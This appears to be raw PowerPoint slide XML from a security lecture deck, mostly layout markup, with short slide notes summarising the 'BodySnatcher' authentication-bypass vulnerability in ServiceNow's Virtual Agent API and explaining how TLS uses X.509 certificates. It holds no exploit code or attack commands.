          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C123C96B-2B3F-7242-90A1-56E5F222F20D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32806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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3476124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BodySnatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a critical authentication bypass vulnerability in ServiceNow's Virtual Agent API and Now Assist AI Agents application. It allowed an unauthenticated attacker—with only a target's email address—to impersonate any ServiceNow user (including administrators), bypassing MFA and SSO entirely, and then execute AI agents to perform privileged actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15087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a client first connects, the client and server complete a TLS handshake during which the server presents an X.509 digital certificate, which is used to help identify and authenticate the server to the client. This certificate includes the identity of the server (e.g. website domain), a temporal validity period, a public key, and a digital signature provided by a trusted third party. The client checks that the certificate’s identity matches the requested domain name, that the certificate is within its validity period, and that the digital signature of the certificate is valid. The certificate’s public key is then used by the client to share a session secret with the server in order to establish an end-to-end cryptographic channel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C123C96B-2B3F-7242-90A1-56E5F222F20D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3244532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Shape 117"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="625078"/>
            <a:ext cx="15609094" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 118"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3134320"/>
            <a:ext cx="15609094" cy="9336129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="565914" indent="-565914">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1064106" indent="-619606">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:defRPr sz="4600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1481666" indent="-592666">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1926166" indent="-592666">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2370666" indent="-592666">
              <a:spcBef>
                <a:spcPts val="5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6" name="Shape 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4128192" y="2107406"/>
            <a:ext cx="16117654" cy="128"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="0433FF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119562" y="339328"/>
            <a:ext cx="16109157" cy="1732360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="7900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1219200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="6600" b="1">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119562" y="2518171"/>
            <a:ext cx="16109157" cy="10287001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="893944" indent="-576444" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="5800">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1367532" indent="-592832" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="1841500" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1746140" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="2235200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="4200">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2190640" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="2679700" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="4200">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2647840" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="3136900" algn="l"/>
              </a:tabLst>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9" name="Shape 129"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19569906" y="12868473"/>
            <a:ext cx="424657" cy="462757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1066800" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="50000"/>
                  </a:srgbClr>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6" name="Shape 136"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="625078"/>
            <a:ext cx="15609094" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Shape 137"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3134320"/>
            <a:ext cx="15609094" cy="9336129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl2pPr marL="1064106" indent="-619606">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:defRPr sz="4600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1481666" indent="-592666">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1926166" indent="-592666">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2370666" indent="-592666">
              <a:spcBef>
                <a:spcPts val="5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138" name="Shape 1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5" name="Shape 145"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19981713" y="12614538"/>
            <a:ext cx="635934" cy="670561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182879" tIns="182879" rIns="182879" bIns="182879" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="4191000"/>
            <a:ext cx="15544800" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="91420" rIns="91420" bIns="91420" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="6800" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="10363200"/>
            <a:ext cx="12344400" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="91420" rIns="91420" bIns="91420" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="4E4845"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="844233" indent="-560071" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="4E4845"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="974725" indent="-457200" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="4E4845"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1184275" indent="-495300" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="4E4845"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1267732" indent="-413657" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="4E4845"/>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4" name="Shape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4128192" y="2107406"/>
            <a:ext cx="16117654" cy="128"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="0433FF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Shape 155"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119562" y="339328"/>
            <a:ext cx="16109157" cy="1732360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="7900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1219200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="6600" b="1">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Shape 156"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119562" y="2518171"/>
            <a:ext cx="16109157" cy="10287001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="893944" indent="-576444" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="5800">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1367532" indent="-592832" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="1841500" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1746140" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="2235200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="4200">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2190640" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="2679700" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="4200">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2647840" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="3136900" algn="l"/>
              </a:tabLst>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hape 157"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19569906" y="12868473"/>
            <a:ext cx="424657" cy="462757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1066800" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="50000"/>
                  </a:srgbClr>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2" name="Shape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4128192" y="2107406"/>
            <a:ext cx="16117654" cy="128"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="0433FF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119562" y="339328"/>
            <a:ext cx="16109157" cy="1732360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="7900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1219200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="6600" b="1">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Shape 174"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119562" y="2518171"/>
            <a:ext cx="16109157" cy="10287001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="893944" indent="-576444" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="5800">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
